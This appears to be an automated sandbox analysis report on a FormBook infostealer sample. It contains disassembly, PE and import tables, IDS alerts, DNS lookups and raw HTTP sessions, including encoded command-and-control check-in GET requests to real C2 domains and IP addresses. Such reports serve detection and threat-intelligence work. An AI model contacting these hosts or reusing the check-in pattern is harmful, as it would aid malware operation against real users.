                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                  mov dword ptr [ecx+04h], 004356D8h
                                                                                                  mov dword ptr [ecx], 004356D0h
                                                                                                  ret
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  mov esi, ecx
                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                  mov dword ptr [esi], 004356B8h
                                                                                                  push eax
                                                                                                  call 00007F431185692Fh
                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                  pop ecx
                                                                                                  je 00007F431185362Ch
                                                                                                  push 0000000Ch
                                                                                                  push esi
                                                                                                  call 00007F4311852BE9h
                                                                                                  pop ecx
                                                                                                  pop ecx
                                                                                                  mov eax, esi
                                                                                                  pop esi
                                                                                                  pop ebp
                                                                                                  retn 0004h
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  sub esp, 0Ch
                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                  call 00007F4311846262h
                                                                                                  push 0043BEF0h
                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                  push eax
                                                                                                  call 00007F43118563E9h
                                                                                                  int3
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  sub esp, 0Ch
                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                  call 00007F43118535A8h
                                                                                                  push 0043C0F4h
                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                  push eax
                                                                                                  call 00007F43118563CCh
                                                                                                  int3
                                                                                                  jmp 00007F4311857E67h
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  push 00422900h
                                                                                                  push dword ptr fs:[00000000h]
                                                                                                  Programming Language:
                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                  • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0x19658 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7e000 | 0x233c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x24720 | 0x1000 | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0x19658 | 0x19800 | False | 0.7920113357843137 | data | 7.266223306948891 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x7e000 | 0x233c | 0x2400 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64764 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x652ac | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x66858 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | | | 0.36585365853658536
RT_ICON | 0x66ec0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | | | 0.4489247311827957
RT_ICON | 0x671a8 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | | | 0.555327868852459
RT_ICON | 0x67390 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | | | 0.5371621621621622
RT_ICON | 0x674b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | | | 0.6327292110874201
RT_ICON | 0x68360 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | | | 0.733754512635379
RT_ICON | 0x68c08 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | | | 0.6970046082949308
RT_ICON | 0x692d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | | | 0.4848265895953757
RT_ICON | 0x69838 | 0xd5ea | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9983382637595413
RT_ICON | 0x76e24 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.4654564315352697
RT_ICON | 0x793cc | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.5567542213883677
RT_ICON | 0x7a474 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | | | 0.7008196721311475
RT_ICON | 0x7adfc | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.5780141843971631
RT_DIALOG | 0x7b264 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x7b4ec | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x7b628 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x7b714 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x7b844 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x7bb7c | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x7bdd0 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x7bfb4 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x7c180 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x7c338 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x7c480 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x7c8ec | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x7ca54 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x7cba8 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x7ccb4 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x7cd70 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x7ce48 | 0xbc | data | | | 0.6170212765957447
RT_MANIFEST | 0x7cf04 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
10/06/23-15:46:24.770092 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49713 | 80 | 192.168.2.8 | 142.234.186.98
10/06/23-15:47:05.527481 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49714 | 80 | 192.168.2.8 | 170.33.13.246
10/06/23-15:48:47.739146 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49721 | 80 | 192.168.2.8 | 75.2.115.196
10/06/23-15:47:26.584409 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49715 | 80 | 192.168.2.8 | 91.195.240.19
10/06/23-15:48:06.495640 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49719 | 80 | 192.168.2.8 | 66.96.160.140
10/06/23-15:46:05.442049 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49711 | 80 | 192.168.2.8 | 77.222.40.147
10/06/23-15:47:46.016751 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49716 | 80 | 192.168.2.8 | 62.72.50.244
10/06/23-15:48:27.268039 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49720 | 80 | 192.168.2.8 | 103.224.182.242
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 6, 2023 15:46:04.416234016 CEST | 192.168.2.8 | 1.1.1.1 | 0xdcca | Standard query (0) | www.othersidewear.com | A (IP address) | IN (0x0001) | false
Oct 6, 2023 15:46:24.462126970 CEST | 192.168.2.8 | 1.1.1.1 | 0xf5d8 | Standard query (0) | www.91fulizifen.com | A (IP address) | IN (0x0001) | false
Oct 6, 2023 15:46:44.368113041 CEST | 192.168.2.8 | 1.1.1.1 | 0x10ef | Standard query (0) | www.pendletonofficial.shop | A (IP address) | IN (0x0001) | false
Oct 6, 2023 15:47:04.713597059 CEST | 192.168.2.8 | 1.1.1.1 | 0x362b | Standard query (0) | www.shayun.net | A (IP address) | IN (0x0001) | false
Oct 6, 2023 15:47:25.055834055 CEST | 192.168.2.8 | 1.1.1.1 | 0x1316 | Standard query (0) | www.brownkrosshui.com | A (IP address) | IN (0x0001) | false
Oct 6, 2023 15:47:26.070884943 CEST | 192.168.2.8 | 1.1.1.1 | 0x1316 | Standard query (0) | www.brownkrosshui.com | A (IP address) | IN (0x0001) | false
Oct 6, 2023 15:47:45.540530920 CEST | 192.168.2.8 | 1.1.1.1 | 0xaad1 | Standard query (0) | www.usbulletinnow.com | A (IP address) | IN (0x0001) | false
Oct 6, 2023 15:48:05.838570118 CEST | 192.168.2.8 | 1.1.1.1 | 0x2e6f | Standard query (0) | www.im-newbie-journal.online | A (IP address) | IN (0x0001) | false
Oct 6, 2023 15:48:26.962131023 CEST | 192.168.2.8 | 1.1.1.1 | 0x518b | Standard query (0) | www.tygyro.com | A (IP address) | IN (0x0001) | false
Oct 6, 2023 15:48:47.337629080 CEST | 192.168.2.8 | 1.1.1.1 | 0x1a82 | Standard query (0) | www.87b52.club | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 6, 2023 15:46:05.112912893 CEST | 1.1.1.1 | 192.168.2.8 | 0xdcca | No error (0) | www.othersidewear.com | - | 77.222.40.147 | A (IP address) | IN (0x0001) | false
Oct 6, 2023 15:46:24.621404886 CEST | 1.1.1.1 | 192.168.2.8 | 0xf5d8 | No error (0) | www.91fulizifen.com | - | 142.234.186.98 | A (IP address) | IN (0x0001) | false
Oct 6, 2023 15:46:44.517919064 CEST | 1.1.1.1 | 192.168.2.8 | 0x10ef | Name error (3) | www.pendletonofficial.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 6, 2023 15:47:05.363195896 CEST | 1.1.1.1 | 192.168.2.8 | 0x362b | No error (0) | www.shayun.net | overdue.aliyun.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 6, 2023 15:47:05.363195896 CEST | 1.1.1.1 | 192.168.2.8 | 0x362b | No error (0) | overdue.aliyun.com | - | 170.33.13.246 | A (IP address) | IN (0x0001) | false
Oct 6, 2023 15:47:26.297071934 CEST | 1.1.1.1 | 192.168.2.8 | 0x1316 | No error (0) | www.brownkrosshui.com | parkingpage.namecheap.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 6, 2023 15:47:26.297071934 CEST | 1.1.1.1 | 192.168.2.8 | 0x1316 | No error (0) | parkingpage.namecheap.com | - | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Oct 6, 2023 15:47:45.723089933 CEST | 1.1.1.1 | 192.168.2.8 | 0xaad1 | No error (0) | www.usbulletinnow.com | usbulletinnow.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 6, 2023 15:47:45.723089933 CEST | 1.1.1.1 | 192.168.2.8 | 0xaad1 | No error (0) | usbulletinnow.com | - | 62.72.50.244 | A (IP address) | IN (0x0001) | false
Oct 6, 2023 15:48:06.283337116 CEST | 1.1.1.1 | 192.168.2.8 | 0x2e6f | No error (0) | www.im-newbie-journal.online | - | 66.96.160.140 | A (IP address) | IN (0x0001) | false
Oct 6, 2023 15:48:27.121669054 CEST | 1.1.1.1 | 192.168.2.8 | 0x518b | No error (0) | www.tygyro.com | - | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Oct 6, 2023 15:48:47.603353024 CEST | 1.1.1.1 | 192.168.2.8 | 0x1a82 | No error (0) | www.87b52.club | - | 75.2.115.196 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.8 | 49711 | 77.222.40.147 | 80 | C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Oct 6, 2023 15:46:05.442049026 CEST73OUTGET /hesf/?jBZ=szcn2kpEQ6L2Syu9mG2pKozAyrZLMpz3ThmLak2r9KpoKfLz6EjH9XrJVzpw+e6nWP1B&Gvw=T4RpitPpFtBLx HTTP/1.1
                                                                                                  Host: www.othersidewear.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Oct 6, 2023 15:46:06.205346107 CEST | 74 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                  Server: nginx/1.23.2
                                                                                                  Date: Fri, 06 Oct 2023 13:46:06 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                  X-Redirect-By: WordPress
                                                                                                  Location: http://othersidewear.com/hesf/?jBZ=szcn2kpEQ6L2Syu9mG2pKozAyrZLMpz3ThmLak2r9KpoKfLz6EjH9XrJVzpw+e6nWP1B&Gvw=T4RpitPpFtBLx


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  1 | 192.168.2.8 | 49713 | 142.234.186.98 | 80 | C:\Windows\explorer.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                  Oct 6, 2023 15:46:24.770092010 CEST | 77 | OUT | GET /hesf/?jBZ=d2AGz1H3YsI9kghQJOJ7DZyuiCPgqoB+sSxuqf6m27exoGivXrHz5sUA11+t0RjRixK2&Gvw=T4RpitPpFtBLx HTTP/1.1
                                                                                                  Host: www.91fulizifen.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Oct 6, 2023 15:46:24.918895960 CEST | 79 | IN | HTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 06 Oct 2023 13:46:24 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  Data Raw: 36 36 39 0d 0a 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0a 20 20 20 20 7d 0a 20 20 20 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0a 20 20 20 20 7d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 09 76 61 72 20 63 61 6e 6f 6e 69 63 61 6c 55 52 4c 2c 20 63 75 72 50 72 6f 74 6f 63 6f 6c 3b 0a 09 09 2f 2f 47 65 74 20 74 68 65 20 20 74 61 
67 0a 09 09 76 61 72 20 78 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 6c 69 6e 6b 22 29 3b 0a 09 09 2f 2f 46 69 6e 64 20 74 68 65 20 6c 61 73 74 20 63 61 6e 6f 6e 69 63 61 6c 20 55 52 4c 0a 09 09 69 66 28 78 2e 6c 65 6e 67 74 68 20 3e 20 30 29 7b 0a 09 09 09 66 6f 72 20 28 69 3d 30 3b 69 3c 78 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 0a 09 09 09 09 69 66 28 78 5b 69 5d 2e 72 65 6c 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 3d 3d 20 27 63 61 6e 6f 6e 69 63 61 6c 27 20 26 26 20 78 5b 69 5d 2e 68 72 65 66 29 7b 0a 09 09 09 09 09 63 61 6e 6f 6e 69 63 61 6c 55 52 4c 3d 78 5b 69 5d 2e 68 72 65 66 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 0a 09 09 2f 2f 47 65 74 20 70 72 6f 74 6f 63 6f 6c 0a 09 20 20 20 20 69 66 20 28 21 63 61 6e 6f 6e 69 63 61 6c 55 52 4c 29 7b 0a 09 20 20 20 20 09 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0a 09 20 20 20 20 7d 0a 09 20 20 20 20 65 6c 73 65 7b 0a 09 20 20 20 20 09 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 63 61 6e 6f 6e 69 63 61 6c 55 52 4c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0a 09 20 20 20 20 7d 0a 09 20 20 20 20 2f 2f 47 65 74 20 63 75 72 72 65 6e 74 20 55 52 4c 20 69 66 20 74 68 65 20 63 61 6e 6f 6e 69 63 61 6c 20 55 52 4c 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 0a 09 20 20 20 20 69 66
                                                                                                  Data Ascii: 669<html><head><title>403 Not Found</title></head><body><center><h1>403 Not Found</h1></center><hr><center>nginx</center><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script><script><script>(function(){var canonicalURL, curProtocol;//Get the tagvar x=document.getElementsByTagName("link");//Find the last canonical URLif(x.length > 0){for (i=0;i<x.length;i++){if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){canonicalURL=x[i].href;}}}//Get protocol if (!canonicalURL){ curProtocol = window.location.protocol.split(':')[0]; } else{ curProtocol = canonicalURL.split(':')[0]; } //Get current URL if the canonical URL does not exist if
                                                                                                  Oct 6, 2023 15:46:24.918935061 CEST | 79 | IN | Data Raw: 20 28 21 63 61 6e 6f 6e 69 63 61 6c 55 52 4c 29 20 63 61 6e 6f 6e 69 63 61 6c 55 52 4c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 0a 09 20 20 20 20 2f 2f 41 73 73 69 67 6e 20 73 63 72 69 70 74 20 63 6f 6e 74 65 6e 74
                                                                                                  Data Ascii: (!canonicalURL) canonicalURL = window.location.href; //Assign script content. Replace current URL with the canonical URL !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.
                                                                                                  Oct 6, 2023 15:46:24.918970108 CEST | 79 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  2 | 192.168.2.8 | 49714 | 170.33.13.246 | 80 | C:\Windows\explorer.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                  Oct 6, 2023 15:47:05.527481079 CEST | 80 | OUT | GET /hesf/?jBZ=rBBm79yWj/0scTu35nBTjefHB3yHFR/9uN8IXoi0DRbgMbd2cnMvsZYXFupsHQ3mqy7J&Gvw=T4RpitPpFtBLx HTTP/1.1
                                                                                                  Host: www.shayun.net
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Oct 6, 2023 15:47:06.003338099 CEST | 81 | IN | HTTP/1.1 403 Forbidden
                                                                                                  Date: Fri, 06 Oct 2023 13:47:05 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 673
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 73 68 61 79 75 6e 2e 6e 65 74 2f 68 65 73 66 2f 3f 6a 42 5a 3d 72 42 42 6d 37 39 79 57 6a 2f 30 73 63 54 75 33 35 6e 42 54 6a 65 66 48 42 33 79 48 46 52 2f 39 75 4e 38 49 58 6f 69 30 44 52 62 67 4d 62 64 32 63 6e 4d 76 73 5a 59 58 46 75 70 73 48 51 33 6d 71 79 37 4a 26 61 6d 70 3b 47 76 77 3d 54 34 52 70 69 74 50 70 46 74 42 4c 78 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 69 7a 6a 36 63 64 77 37 33 6f 71 39 37 32 73 39 73 37 78 6a 68 78 